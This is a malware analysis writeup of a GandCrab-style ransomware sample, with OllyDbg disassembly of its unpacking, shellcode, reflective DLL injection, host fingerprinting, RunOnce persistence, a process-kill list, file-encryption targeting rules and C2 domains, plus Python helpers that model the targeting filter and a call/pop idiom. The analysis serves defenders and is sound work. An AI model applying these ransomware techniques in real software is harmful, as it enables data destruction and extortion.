Related files:
sample.exe: the malware sample
dimuzd.exe: the copy of the sample dropped under C:\Documents and Settings\Administrator\Application Data\Microsoft\
PE_1.exe: the unpacked sample
PE_2.dll: the DLL the sample injects into its own process
Shellcode: the shellcode decrypted by the sample
CRAB-DECRYPT.txt: the ransom note dropped by the sample
1.txt.CRAB: a file encrypted by the sample
pidor.bmp: the desktop wallpaper set by the sample
Observed behaviour:
1: Collects the user name, CPU type, disk space and other host information, and creates a mutex so that only one instance runs
2: Starts a thread that looks for the driver files of common anti-virus products on the host; if one is found the sample exits
3: Copies itself to C:\Documents and Settings\Administrator\Application Data\Microsoft\ under a random name of six letters + ".exe" and registers that copy to run at startup
4: Enumerates processes and terminates any whose image name is in the following list (given as the strings appear in the binary; the three "agntsvc.exe..." entries are concatenated names and so never match a real process, and "sqlservr.exe" is listed twice):
"msftesql.exe", "sqlagent.exe", "sqlbrowser.exe", "sqlservr.exe", "sqlwriter.exe", "oracle.exe", "ocssd.exe", "dbsnmp.exe", "synctime.exe", "mydesktopqos.exe", "agntsvc.exeisqlplussvc.exe", "xfssvccon.exe", "mydesktopservice.exe", "ocautoupds.exe", "agntsvc.exeagntsvc.exe", "agntsvc.exeencsvc.exe", "firefoxconfig.exe", "tbirdconfig.exe", "ocomm.exe", "mysqld.exe", "mysqld-nt.exe", "mysqld-opt.exe", "dbeng50.exe", "sqbcoreservice.exe", "excel.exe", "infopath.exe", "msaccess.exe", "mspub.exe", "onenote.exe", "outlook.exe", "powerpnt.exe", "steam.exe", "sqlservr.exe", "thebat.exe", "thebat64.exe", "thunderbird.exe", "visio.exe", "winword.exe", "wordpad.exe"
5: Generates an RSA key pair for the file-encryption scheme
6: Resolves carder.bit, querying the name servers ns2.wowservers.ru and ns1.wowservers.ru
7: Connects to the server and sends the collected host information together with the RSA public key, the private key and related data
8: Enumerates the drives and checks each drive type; local, network and RAM drives are infected. A thread then encrypts every file on the drive except those matching any of the following:
   extension: .ani .cab .cpl .cur .diagcab .diagpkg .dll .drv .hlp .ldf .icl .icns .ico .ics .lnk .key .idx .mod .mpa .msc .msp .msstyles .msu .nomedia .ocx .prf .rom .rtp .scr .shs .spl .sys .theme .themepack .exe .bat .cmd .CRAB .crab .GDCB .gdcb .gandcrab .yassine_lemmou
   file name: "desktop.ini", "autorun.inf", "ntuser.dat", "iconcache.db", "bootsect.bak", "boot.ini", "ntuser.dat.log", "thumbs.db", "CRAB-DECRYPT.txt", "*.sql"
   path containing: "\ProgramData\", "\IETldCache\", "\Boot\", "\Program Files\", "\Tor Browser\", "Ransomware", "\All Users\", "\Local Settings\", "\Windows\" or another special system folder
   Encrypted files get the additional extension .CRAB, and CRAB-DECRYPT.txt is written to every directory that contains an encrypted file and to the desktop
9: Sets the desktop wallpaper to pidor.bmp
10: Shuts the computer down after a 60-second countdown
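To make the target-selection rules of step 8 concrete, here is a small Python dry-run of them. It is an example added to this writeup, not code from the sample or from the original post: the three exclusion lists are copied from step 8 as written there (including the "*.sql" file-name wildcard), the drive-type check is left out, and the paths fed to it are constructed. Comparisons are case-insensitive, as Windows paths are, and the path rule is a plain substring test on the whole path, which is how step 8 describes it.

```python
import ntpath  # Windows path semantics, usable on any OS

# Exclusion lists as given in step 8 of the writeup (lower-cased for comparison).
SKIP_EXTENSIONS = {
    ".ani", ".cab", ".cpl", ".cur", ".diagcab", ".diagpkg", ".dll", ".drv", ".hlp",
    ".ldf", ".icl", ".icns", ".ico", ".ics", ".lnk", ".key", ".idx", ".mod", ".mpa",
    ".msc", ".msp", ".msstyles", ".msu", ".nomedia", ".ocx", ".prf", ".rom", ".rtp",
    ".scr", ".shs", ".spl", ".sys", ".theme", ".themepack", ".exe", ".bat", ".cmd",
    ".crab", ".gdcb", ".gandcrab", ".yassine_lemmou",
}
SKIP_NAMES = {
    "desktop.ini", "autorun.inf", "ntuser.dat", "iconcache.db", "bootsect.bak",
    "boot.ini", "ntuser.dat.log", "thumbs.db", "crab-decrypt.txt",
}
SKIP_PATH_PARTS = (
    "\\programdata\\", "\\ietldcache\\", "\\boot\\", "\\program files\\",
    "\\tor browser\\", "ransomware", "\\all users\\", "\\local settings\\", "\\windows\\",
)
ENCRYPTED_SUFFIX = ".CRAB"
NOTE_NAME = "CRAB-DECRYPT.txt"


def is_target(path):
    """True if the sample would encrypt this file.

    All three rules are case-insensitive (the sample compares with lstrcmpiW and
    Windows paths are case-insensitive). The path rule is a substring test on the
    full path, so a file named "ransomware.doc" is skipped too.
    """
    lower = path.lower()
    name = ntpath.basename(lower)
    ext = ntpath.splitext(name)[1]
    if any(part in lower for part in SKIP_PATH_PARTS):
        return False
    if name in SKIP_NAMES or name.endswith(".sql"):
        return False
    return ext not in SKIP_EXTENSIONS


def plan(paths):
    """Dry-run the encryption pass over a list of paths.

    Returns (renames, note_dirs): the new name of every file that would be
    encrypted (original name + .CRAB) and the sorted list of directories that
    would receive CRAB-DECRYPT.txt (the desktop copy is not modelled here).
    """
    renames = {}
    note_dirs = set()
    for path in paths:
        if is_target(path):
            renames[path] = path + ENCRYPTED_SUFFIX
            note_dirs.add(ntpath.dirname(path))
    return renames, sorted(note_dirs)


# Constructed sample paths; not taken from the infected machine.
SAMPLE_PATHS = [
    r"C:\Documents and Settings\Administrator\Desktop\1.txt",
    r"C:\Documents and Settings\Administrator\Desktop\CRAB-DECRYPT.txt",
    r"C:\Windows\system32\calc.exe",
    r"C:\Program Files\app\readme.txt",
    r"D:\backup\dump.sql",
    r"D:\backup\report.docx.CRAB",
    r"\\fileserver\share\finance\budget.xlsx",
]

if __name__ == "__main__":
    renames, dirs = plan(SAMPLE_PATHS)
    for src, dst in renames.items():
        print(f"{src} -> {dst}")
    print("ransom note written to:", dirs)
```

Of the seven constructed paths only 1.txt and the network share's budget.xlsx survive the filter: the note itself, the already-encrypted .CRAB file, the .sql dump and everything under \Windows\ and \Program Files\ are skipped, which is why a victim's system still boots but their documents do not open.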
Analysis notes:
Decrypting the shellcode and executing it. VirtualProtect first makes the 0x1A884-byte buffer at 00175A60 writable and executable, call 00401449 decrypts it in place, and call dword ptr [4621E8] then transfers control into the decrypted buffer.
0040174D |. 50 push eax ; /pOldProtect
0040174E |. FF75 FC push dword ptr [ebp-4] ; |NewProtect
00401751 |. FF35 30634601 push dword ptr [1466330] ; |Size = 1A884 (108676.)
00401757 |. FF35 E8214600 push dword ptr [4621E8] ; |Address = 00175A60
0040175D |. FF15 34E04000 call dword ptr [<&KERNEL32.VirtualPro>; \VirtualProtect
00401763 |. A1 E8214600 mov eax, dword ptr [4621E8]
00401768 |. 8B1D 30634601 mov ebx, dword ptr [1466330]
0040176E |. 8B3D C0404100 mov edi, dword ptr [4140C0]
00401774 |. 56 push esi ; /lParam
00401775 |. 56 push esi ; |wParam
00401776 |. 56 push esi ; |Message
00401777 |. 56 push esi ; |hWnd
00401778 |. 8945 F8 mov dword ptr [ebp-8], eax ; |
0040177B |. FF15 4CE14000 call dword ptr [<&USER32.PostMessageA>; \PostMessageA
00401781 |. 53 push ebx
00401782 |. FF75 F8 push dword ptr [ebp-8]
00401785 |. 893D E4214600 mov dword ptr [4621E4], edi
0040178B |. E8 B9FCFFFF call 00401449 ; shellcode decryption routine
00401790 |. 90 nop
00401791 |. 8105 30634601>add dword ptr [1466330], 388B2AFF
0040179B |. FF15 E8214600 call dword ptr [4621E8] ; execute the decrypted shellcode
The two "instructions" at 00175A98 and 00175A9A are not real code: call 00175A9C jumps over those four bytes, and the pop eax at 00175A9C receives the return address 00175A98, which the following mov eax, dword ptr [eax] then dereferences. OllyDbg nevertheless disassembles the four bytes as two add byte ptr [eax], al and loses sync. Either NOP the bytes out (which changes the dword that mov eax, [eax] reads) or, better, step over the call with F8 when you reach 00175A93; otherwise OllyDbg easily runs away.
00175A82 50 push eax
00175A83 8D45 D8 lea eax, dword ptr [ebp-28]
00175A86 50 push eax
00175A87 8D45 A0 lea eax, dword ptr [ebp-60]
00175A8A 50 push eax
00175A8B E8 0A080000 call 0017629A
00175A90 83C4 0C add esp, 0C
00175A93 E8 04000000 call 00175A9C
00175A98 0000 add byte ptr [eax], al
00175A9A 0000 add byte ptr [eax], al
00175A9C 58 pop eax
00175A9D 8985 74FFFFFF mov dword ptr [ebp-8C], eax
00175AA3 8B00 mov eax, dword ptr [eax]
00175AA5 85C0 test eax, eax
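The call/pop pair above is the standard position-independent "get EIP" idiom, and it is what knocks OllyDbg's disassembly out of sync. The following Python helper is an example added to this writeup (not code from the sample or the original post): it evaluates such a pair over the bytes of the listing, copied from the dump above, reporting where the call lands, what value the pop receives and which bytes were skipped, and it shows why the "NOP them out" fix changes the value the later mov eax, [eax] reads.

```python
import struct

# Bytes of the listing from 00175A93 to 00175AA6, copied from the OllyDbg dump above.
SNIPPET_BASE = 0x00175A93
SNIPPET = bytes.fromhex(
    "E804000000"    # 00175A93  call 00175A9C   (rel32 = +4: skips the next four bytes)
    "00000000"      # 00175A98  four data bytes, shown by OllyDbg as two 'add byte ptr [eax], al'
    "58"            # 00175A9C  pop eax         (eax = return address = 00175A98)
    "898574FFFFFF"  # 00175A9D  mov [ebp-8C], eax
    "8B00"          # 00175AA3  mov eax, [eax]  (reads the dword stored at 00175A98)
    "85C0"          # 00175AA5  test eax, eax
)

POP_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # opcodes 58..5F


def resolve_call_pop(code, base, offset=0):
    """Evaluate a 'call rel32 / pop r32' pair that starts at code[offset].

    Returns None unless the bytes are E8 rel32 landing on a one-byte POP.
    Otherwise returns the call target, the value the pop receives (the return
    address pushed by CALL), the bytes the call jumped over, and the address a
    debugger should resume at after stepping over the call.
    """
    if offset + 5 > len(code) or code[offset] != 0xE8:
        return None
    rel = struct.unpack_from("<i", code, offset + 1)[0]
    ret_addr = base + offset + 5           # CALL pushes the address of the next instruction
    target = ret_addr + rel
    t_off = target - base
    if not 0 <= t_off < len(code) or not 0x58 <= code[t_off] <= 0x5F:
        return None
    skipped = code[offset + 5:t_off] if rel > 0 else b""
    return {
        "call_at": base + offset,
        "target": target,
        "popped": ret_addr,                # what ends up in the register
        "pop_reg": POP_REGS[code[t_off] - 0x58],
        "skipped_range": (offset + 5, t_off),
        "skipped": skipped,
        "data_dword": struct.unpack_from("<I", code, offset + 5)[0] if len(skipped) >= 4 else None,
        "resume": target + 1,              # instruction after the one-byte pop
    }


def nop_skipped_bytes(code, info):
    """The 'NOP them out' fix from the writeup: overwrite the skipped bytes with 0x90.

    This keeps the disassembler in sync, but because 'mov eax, [eax]' later reads
    those bytes as data, the dword it sees becomes 0x90909090 instead of the
    original value. Stepping over the call with F8 avoids that side effect.
    """
    start, end = info["skipped_range"]
    patched = bytearray(code)
    patched[start:end] = b"\x90" * (end - start)
    return bytes(patched)


if __name__ == "__main__":
    info = resolve_call_pop(SNIPPET, SNIPPET_BASE)
    print(f"call at {info['call_at']:08X} -> {info['target']:08X}, "
          f"{info['pop_reg']} = {info['popped']:08X}, skipped {info['skipped'].hex()}, "
          f"resume at {info['resume']:08X}")
```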
The shellcode then copies the embedded PE's sections over the program's own image and calls the entry point. The three arguments below are read from an IMAGE_SECTION_HEADER (SizeOfRawData at +10, VirtualAddress at +C, PointerToRawData at +14): 0xCA00 bytes are copied from 01A50400 to 00401000, the .text section of sample.exe.
00175D57 8B45 FC mov eax, dword ptr [ebp-4]
00175D5A 8985 4CFFFFFF mov dword ptr [ebp-B4], eax
00175D60 8B85 4CFFFFFF mov eax, dword ptr [ebp-B4]
00175D66 FF70 10 push dword ptr [eax+10] ; 0000CA00
00175D69 8B85 4CFFFFFF mov eax, dword ptr [ebp-B4]
00175D6F 8B4D F0 mov ecx, dword ptr [ebp-10]
00175D72 0348 14 add ecx, dword ptr [eax+14]
00175D75 51 push ecx ; 01A50400 source: a block of shellcode (section raw data)
00175D76 8B85 4CFFFFFF mov eax, dword ptr [ebp-B4]
00175D7C 8B8D 70FFFFFF mov ecx, dword ptr [ebp-90]
00175D82 0348 0C add ecx, dword ptr [eax+C]
00175D85 51 push ecx ; 00401000
00175D86 E8 CB080000 call 00176656
…
0017626A FF75 C0 push dword ptr [ebp-40]
0017626D FF55 D4 call dword ptr [ebp-2C]
00176270 59 pop ecx
00176271 8B85 60FFFFFF mov eax, dword ptr [ebp-A0]
00176277 8B40 0D mov eax, dword ptr [eax+D]
0017627A 8985 64FFFFFF mov dword ptr [ebp-9C], eax
00176280 8B85 64FFFFFF mov eax, dword ptr [ebp-9C]
00176286 0385 70FFFFFF add eax, dword ptr [ebp-90]
0017628C C9 leave
0017628D - FFE0 jmp eax ; sample.00401612, the OEP (entry-point RVA + image base)
Reflective DLL injection into its own process and call of the DLL entry point. The code resolves the export named "ReflectiveLoader" of the embedded DLL (PE_2.dll, stored inside the unpacked image at 00414250), makes the 0x13000-byte region PAGE_EXECUTE_READWRITE with VirtualProtect, and calls the loader directly (call edi = PE_1.0041A190).
004011BD |> \8B89 C8424100 mov ecx, dword ptr [ecx+4142C8]
004011C3 |. 53 push ebx
004011C4 |. 56 push esi
004011C5 |. 57 push edi
004011C6 |. E8 65FFFFFF call 00401130
004011CB |. BF 50424100 mov edi, 00414250
004011D0 |. 8D1C07 lea ebx, dword ptr [edi+eax]
004011D3 |. 8B4B 20 mov ecx, dword ptr [ebx+20]
004011D6 |. 895D FC mov dword ptr [ebp-4], ebx
004011D9 |. E8 52FFFFFF call 00401130
004011DE |. 8B4B 24 mov ecx, dword ptr [ebx+24]
004011E1 |. 8D3407 lea esi, dword ptr [edi+eax]
004011E4 |. E8 47FFFFFF call 00401130
004011E9 |. 8B5B 18 mov ebx, dword ptr [ebx+18]
004011EC |. 8BF8 mov edi, eax
004011EE |. 81C7 50424100 add edi, 00414250
004011F4 |. EB 24 jmp short 0040121A
004011F6 |> 8B0E /mov ecx, dword ptr [esi]
004011F8 |. 4B |dec ebx
004011F9 |. E8 32FFFFFF |call 00401130
004011FE |. 05 50424100 |add eax, 00414250
00401203 |. 68 B81D4100 |push 00411DB8 ; ASCII "ReflectiveLoader"
00401208 |. 50 |push eax
00401209 |. E8 22040000 |call 00401630
0040120E |. 59 |pop ecx
……
00401266 . 8DB8 50424100 lea edi, dword ptr [eax+414250]
0040126C . 8D45 E0 lea eax, dword ptr [ebp-20]
0040126F . 50 push eax ; /pOldProtect
00401270 . 6A 40 push 40 ; |NewProtect = PAGE_EXECUTE_READWRITE
00401272 . 68 00300100 push 13000 ; |Size = 13000 (77824.)
00401277 . 68 50424100 push 00414250 ; |Address = PE_1.00414250
0040127C . FF15 50E04000 call dword ptr [<&KERNEL32.VirtualPro>; \VirtualProtect
00401282 . 85C0 test eax, eax
00401284 . 74 30 je short 004012B6
00401286 . FFD7 call edi ; PE_1.0041A190
Collecting host information: user name, computer name, workgroup, OS version, disk space, etc. The field names set up below (pc_user, pc_name, pc_group, av, pc_lang, pc_keyb, os_major, os_bit, ransom_id, hdd, ip) are the keys of the report later sent to the server (step 7). The workgroup is read from HKEY_LOCAL_MACHINE (80000002)\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value "Domain", and falls back to "WORKGROUP" when that value is empty.
01A24498 C746 04 AC04A30>mov dword ptr [esi+4], 1A304AC ; UNICODE "pc_user"
01A2449F C746 10 9C04A30>mov dword ptr [esi+10], 1A3049C ; UNICODE "pc_name"
01A244A6 C746 18 0100000>mov dword ptr [esi+18], 1
01A244AD C746 1C 8804A30>mov dword ptr [esi+1C], 1A30488 ; UNICODE "pc_group"
01A244B4 C746 28 8004A30>mov dword ptr [esi+28], 1A30480 ; UNICODE "av"
01A244BB C746 34 7004A30>mov dword ptr [esi+34], 1A30470 ; UNICODE "pc_lang"
01A244C2 C746 40 6004A30>mov dword ptr [esi+40], 1A30460 ; UNICODE "pc_keyb"
01A244C9 C746 4C 4C04A30>mov dword ptr [esi+4C], 1A3044C ; UNICODE "os_major"
01A244D0 C746 58 3C04A30>mov dword ptr [esi+58], 1A3043C ; UNICODE "os_bit"
01A244D7 C746 60 0100000>mov dword ptr [esi+60], 1
01A244DE C746 64 2804A30>mov dword ptr [esi+64], 1A30428 ; UNICODE "ransom_id"
01A244E5 C746 78 2004A30>mov dword ptr [esi+78], 1A30420 ; UNICODE "hdd"
01A244EC 8986 80000000 mov dword ptr [esi+80], eax
01A244F2 C786 88000000 1>mov dword ptr [esi+88], 1A30418 ; UNICODE "ip"
01A244FC FF15 78B1A201 call dword ptr [1A2B178] ; kernel32.GetProcessHeap
……
01A2810C 8946 08 mov dword ptr [esi+8], eax
01A2810F 51 push ecx
01A28110 50 push eax
01A28111 C745 EC 0001000>mov dword ptr [ebp-14], 100
01A28118 FF15 4CB0A201 call dword ptr [1A2B04C] ; advapi32.GetUserNameW
01A2811E 837E 0C 00 cmp dword ptr [esi+C], 0
01A28122 74 22 je short 01A28146
01A28124 6A 04 push 4
01A28126 68 00300000 push 3000
01A2812B 6A 20 push 20
01A2812D 6A 00 push 0
01A2812F C745 EC 1E00000>mov dword ptr [ebp-14], 1E
01A28136 FFD7 call edi
01A28138 8D4D EC lea ecx, dword ptr [ebp-14]
01A2813B 8946 14 mov dword ptr [esi+14], eax
01A2813E 51 push ecx
01A2813F 50 push eax
01A28140 FF15 04B1A201 call dword ptr [1A2B104] ; kernel32.GetComputerNameW
01A28146 837E 18 00 cmp dword ptr [esi+18], 0
……
01A2816F 50 push eax
01A28170 68 E410A301 push 1A310E4 ; UNICODE "Domain"
01A28175 68 F810A301 push 1A310F8 ; UNICODE "SYSTEM\CurrentControlSet\services\Tcpip\Parameters"
01A2817A 68 02000080 push 80000002
01A2817F E8 DCFEFFFF call 01A28060
01A28184 85C0 test eax, eax
01A28186 74 11 je short 01A28199
01A28188 8B46 20 mov eax, dword ptr [esi+20]
01A2818B 66:8338 00 cmp word ptr [eax], 0
01A2818F 75 15 jnz short 01A281A6
01A28191 68 6011A301 push 1A31160 ; UNICODE "WORKGROUP"
01A28196 50 push eax
01A28197 EB 08 jmp short 01A281A1
Creating the mutex. The name is built from the collected host information, prefixed with "Global\" (here "Global\pc_group=WORKGROUP&ransom_id=..."). If the mutex already exists, the process exits.
01AB5169 68 FC04AC01 push 1AC04FC ; UNICODE "Global\"
01AB516E 56 push esi
01AB516F FF15 84B1AB01 call dword ptr [1ABB184] ; kernel32.lstrcpyW
01AB5175 56 push esi
01AB5176 FF15 40B1AB01 call dword ptr [1ABB140] ; kernel32.lstrlenW
01AB517C 8D4C24 10 lea ecx, dword ptr [esp+10]
01AB5180 8D0446 lea eax, dword ptr [esi+eax*2]
01AB5183 50 push eax
01AB5184 E8 672B0000 call 01AB7CF0
01AB5189 56 push esi ; MutexName = "Global\pc_group=WORKGROUP&ransom_id=6aa1d5d1fc51543e
01AB518A 6A 00 push 0
01AB518C 6A 00 push 0
01AB518E FF15 80B1AB01 call dword ptr [1ABB180] ; kernel32.CreateMutexW
Copying itself to C:\Documents and Settings\Administrator\Application Data\Microsoft\ under a random six-letter file name. The source file is opened read-only (GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING), its size is taken with GetFileSize, and it is mapped with CreateFileMappingW before being written out.
01AB289E 53 push ebx
01AB289F 53 push ebx
01AB28A0 6A 03 push 3
01AB28A2 53 push ebx
01AB28A3 6A 01 push 1
01AB28A5 68 00000080 push 80000000
01AB28AA 51 push ecx
01AB28AB FF15 48B1AB01 call dword ptr [1ABB148] ; kernel32.CreateFileW
01AB28B1 8BF8 mov edi, eax
01AB28B3 83FF FF cmp edi, -1
01AB28B6 74 41 je short 01AB28F9
01AB28B8 53 push ebx
01AB28B9 57 push edi
01AB28BA FF15 60B1AB01 call dword ptr [1ABB160] ; kernel32.GetFileSize
01AB28C0 8945 FC mov dword ptr [ebp-4], eax
01AB28C3 E8 18080000 call 01AB30E0
…
01AB28E3 53 push ebx
01AB28E4 57 push edi
01AB28E5 FF15 3CB1AB01 call dword ptr [1ABB13C] ; kernel32.CreateFileMappingW
01AB28EB 8945 F4 mov dword ptr [ebp-C], eax
01AB28EE 85C0 test eax, eax
Registry modification: RegCreateKeyExW opens HKEY_LOCAL_MACHINE (80000002)\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with samDesired = 0F003F (KEY_ALL_ACCESS), and RegSetValueExW writes a REG_SZ (type 1) value whose name is random ("fadophupyvl" in the run described here, "cozfgrboyac" in the listing below) and whose data is the path of the dropped copy,
for example "C:\Documents and Settings\Administrator\Application Data\Microsoft\dyuhul.exe" (the dropped file name also varies between runs; the file list at the top has dimuzd.exe). Windows deletes a RunOnce value after running it, so the entry fires once at the next logon.
01AB2ACB 6A 00 push 0
01AB2ACD 8D45 FC lea eax, dword ptr [ebp-4]
01AB2AD0 50 push eax
01AB2AD1 6A 00 push 0
01AB2AD3 68 3F000F00 push 0F003F
01AB2AD8 6A 00 push 0
01AB2ADA 6A 00 push 0
01AB2ADC 6A 00 push 0
01AB2ADE 8D85 78FFFFFF lea eax, dword ptr [ebp-88]
01AB2AE4 50 push eax ; SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
01AB2AE5 68 02000080 push 80000002
01AB2AEA FF15 00B0AB01 call dword ptr [1ABB000] ; advapi32.RegCreateKeyExW
01AB2AF0 85C0 test eax, eax
01AB2AF2 75 32 jnz short 01AB2B26
01AB2AF4 57 push edi
01AB2AF5 FF15 40B1AB01 call dword ptr [1ABB140] ; kernel32.lstrlenW
01AB2AFB 03C0 add eax, eax
01AB2AFD 50 push eax
01AB2AFE 57 push edi ; "C:\Documents and Settings\Administrator\Application Data\Microsoft\dyuhul.exe"
01AB2AFF 6A 01 push 1
01AB2B01 6A 00 push 0
01AB2B03 8D45 E4 lea eax, dword ptr [ebp-1C]
01AB2B06 50 push eax ; ValueName = "cozfgrboyac"
01AB2B07 FF75 FC push dword ptr [ebp-4] ; hKey = AC
01AB2B0A FF15 08B0AB01 call dword ptr [1ABB008] ; advapi32.RegSetValueExW
Enumerating processes and terminating those whose image name matches one of the following (as the strings appear in the binary):
"msftesql.exe", "sqlagent.exe", "sqlbrowser.exe", "sqlservr.exe", "sqlwriter.exe", "oracle.exe", "ocssd.exe", "dbsnmp.exe", "synctime.exe", "mydesktopqos.exe", "agntsvc.exeisqlplussvc.exe", "xfssvccon.exe", "mydesktopservice.exe", "ocautoupds.exe", "agntsvc.exeagntsvc.exe", "agntsvc.exeencsvc.exe", "firefoxconfig.exe", "tbirdconfig.exe", "ocomm.exe", "mysqld.exe", "mysqld-nt.exe", "mysqld-opt.exe", "dbeng50.exe", "sqbcoreservice.exe", "excel.exe", "infopath.exe", "msaccess.exe", "mspub.exe", "onenote.exe", "outlook.exe", "powerpnt.exe", "steam.exe", "sqlservr.exe", "thebat.exe", "thebat64.exe", "thunderbird.exe", "visio.exe", "winword.exe", "wordpad.exe"
The loop takes a CreateToolhelp32Snapshot, walks it with Process32FirstW/Process32NextW (PROCESSENTRY32W, dwSize = 22C) and compares szExeFile ([ebx+24]) against all 39 table entries (cmp esi, 27) with lstrcmpiW. On a match it calls OpenProcess with dwDesiredAccess = 1 (PROCESS_TERMINATE) on th32ProcessID ([ebx+8]) and then TerminateProcess. Two quirks of the table: the three "agntsvc.exe..." entries are concatenated names, so the real agntsvc.exe, isqlplussvc.exe and encsvc.exe processes are never matched, and "sqlservr.exe" occupies two slots that point to the same string at 1AC0564.
01AB51F3 C74424 18 0C05A>mov dword ptr [esp+18], 1AC050C ; UNICODE "msftesql.exe"
01AB51FB C74424 1C 2805A>mov dword ptr [esp+1C], 1AC0528 ; UNICODE "sqlagent.exe"
01AB5203 C74424 20 4405A>mov dword ptr [esp+20], 1AC0544 ; UNICODE "sqlbrowser.exe"
01AB520B C74424 24 6405A>mov dword ptr [esp+24], 1AC0564 ; UNICODE "sqlservr.exe"
01AB5213 C74424 28 8005A>mov dword ptr [esp+28], 1AC0580 ; UNICODE "sqlwriter.exe"
01AB521B C74424 2C 9C05A>mov dword ptr [esp+2C], 1AC059C ; UNICODE "oracle.exe"
01AB5223 C74424 30 B405A>mov dword ptr [esp+30], 1AC05B4 ; UNICODE "ocssd.exe"
01AB522B C74424 34 C805A>mov dword ptr [esp+34], 1AC05C8 ; UNICODE "dbsnmp.exe"
01AB5233 C74424 38 E005A>mov dword ptr [esp+38], 1AC05E0 ; UNICODE "synctime.exe"
01AB523B C74424 3C FC05A>mov dword ptr [esp+3C], 1AC05FC ; UNICODE "mydesktopqos.exe"
01AB5243 C74424 40 2006A>mov dword ptr [esp+40], 1AC0620 ; UNICODE "agntsvc.exeisqlplussvc.exe"
01AB524B C74424 44 5806A>mov dword ptr [esp+44], 1AC0658 ; UNICODE "xfssvccon.exe"
01AB5253 C74424 48 7406A>mov dword ptr [esp+48], 1AC0674 ; UNICODE "mydesktopservice.exe"
01AB525B C74424 4C A006A>mov dword ptr [esp+4C], 1AC06A0 ; UNICODE "ocautoupds.exe"
01AB5263 C74424 50 C006A>mov dword ptr [esp+50], 1AC06C0 ; UNICODE "agntsvc.exeagntsvc.exe"
01AB526B C74424 54 F006A>mov dword ptr [esp+54], 1AC06F0 ; UNICODE "agntsvc.exeencsvc.exe"
01AB5273 C74424 58 1C07A>mov dword ptr [esp+58], 1AC071C ; UNICODE "firefoxconfig.exe"
01AB527B C74424 5C 4007A>mov dword ptr [esp+5C], 1AC0740 ; UNICODE "tbirdconfig.exe"
01AB5283 C74424 60 6007A>mov dword ptr [esp+60], 1AC0760 ; UNICODE "ocomm.exe"
01AB528B C74424 64 7407A>mov dword ptr [esp+64], 1AC0774 ; UNICODE "mysqld.exe"
01AB5293 C74424 68 8C07A>mov dword ptr [esp+68], 1AC078C ; UNICODE "mysqld-nt.exe"
01AB529B C74424 6C A807A>mov dword ptr [esp+6C], 1AC07A8 ; UNICODE "mysqld-opt.exe"
01AB52A3 C74424 70 C807A>mov dword ptr [esp+70], 1AC07C8 ; UNICODE "dbeng50.exe"
01AB52AB C74424 74 E007A>mov dword ptr [esp+74], 1AC07E0 ; UNICODE "sqbcoreservice.exe"
01AB52B3 C74424 78 0808A>mov dword ptr [esp+78], 1AC0808 ; UNICODE "excel.exe"
01AB52BB C74424 7C 1C08A>mov dword ptr [esp+7C], 1AC081C ; UNICODE "infopath.exe"
01AB52C3 C78424 80000000>mov dword ptr [esp+80], 1AC0838 ; UNICODE "msaccess.exe"
01AB52CE C78424 84000000>mov dword ptr [esp+84], 1AC0854 ; UNICODE "mspub.exe"
01AB52D9 C78424 88000000>mov dword ptr [esp+88], 1AC0868 ; UNICODE "onenote.exe"
01AB52E4 C78424 8C000000>mov dword ptr [esp+8C], 1AC0880 ; UNICODE "outlook.exe"
01AB52EF C78424 90000000>mov dword ptr [esp+90], 1AC0898 ; UNICODE "powerpnt.exe"
01AB52FA C78424 94000000>mov dword ptr [esp+94], 1AC08B4 ; UNICODE "steam.exe"
01AB5305 C78424 98000000>mov dword ptr [esp+98], 1AC0564 ; UNICODE "sqlservr.exe"
01AB5310 C78424 9C000000>mov dword ptr [esp+9C], 1AC08C8 ; UNICODE "thebat.exe"
01AB531B C78424 A0000000>mov dword ptr [esp+A0], 1AC08E0 ; UNICODE "thebat64.exe"
01AB5326 C78424 A4000000>mov dword ptr [esp+A4], 1AC08FC ; UNICODE "thunderbird.exe"
01AB5331 C78424 A8000000>mov dword ptr [esp+A8], 1AC091C ; UNICODE "visio.exe"
01AB533C C78424 AC000000>mov dword ptr [esp+AC], 1AC0930 ; UNICODE "winword.exe"
01AB5347 C78424 B0000000>mov dword ptr [esp+B0], 1AC0948 ; UNICODE "wordpad.exe"
01AB5352 FF15 D8B0AB01 call dword ptr [1ABB0D8] ; kernel32.CreateToolhelp32Snapshot
01AB5358 6A 04 push 4
01AB535A 68 00300000 push 3000
01AB535F 68 2C020000 push 22C
01AB5364 8BF0 mov esi, eax
01AB5366 6A 00 push 0
01AB5368 897424 1C mov dword ptr [esp+1C], esi
01AB536C FF15 70B1AB01 call dword ptr [1ABB170] ; kernel32.VirtualAlloc
01AB5372 8BD8 mov ebx, eax
01AB5374 85DB test ebx, ebx
01AB5376 74 13 je short 01AB538B
01AB5378 C703 2C020000 mov dword ptr [ebx], 22C
01AB537E 83FE FF cmp esi, -1
01AB5381 74 08 je short 01AB538B
01AB5383 53 push ebx
01AB5384 56 push esi
01AB5385 FF15 D0B0AB01 call dword ptr [1ABB0D0] ; kernel32.Process32FirstW
01AB538B 8B3D E0B0AB01 mov edi, dword ptr [1ABB0E0] ; kernel32.CloseHandle
01AB5391 8D4B 24 lea ecx, dword ptr [ebx+24]
01AB5394 33F6 xor esi, esi
01AB5396 EB 08 jmp short 01AB53A0
01AB5398 8DA424 00000000 lea esp, dword ptr [esp]
01AB539F 90 nop
01AB53A0 51 push ecx
01AB53A1 FF74B4 14 push dword ptr [esp+esi*4+14]
01AB53A5 FF15 38B1AB01 call dword ptr [1ABB138] ; kernel32.lstrcmpiW
01AB53AB 85C0 test eax, eax
01AB53AD 75 2C jnz short 01AB53DB
01AB53AF FF73 08 push dword ptr [ebx+8]
01AB53B2 50 push eax
01AB53B3 6A 01 push 1
01AB53B5 FF15 1CB1AB01 call dword ptr [1ABB11C] ; kernel32.OpenProcess
01AB53BB 8BF8 mov edi, eax
01AB53BD 85FF test edi, edi
01AB53BF 74 14 je short 01AB53D5
01AB53C1 6A 00 push 0
01AB53C3 57 push edi
01AB53C4 FF15 A4B0AB01 call dword ptr [1ABB0A4] ; kernel32.TerminateProcess
01AB53CA 57 push edi
01AB53CB 8B3D E0B0AB01 mov edi, dword ptr [1ABB0E0] ; kernel32.CloseHandle
01AB53D1 FFD7 call edi
01AB53D3 EB 06 jmp short 01AB53DB
01AB53D5 8B3D E0B0AB01 mov edi, dword ptr [1ABB0E0] ; kernel32.CloseHandle
01AB53DB 46 inc esi
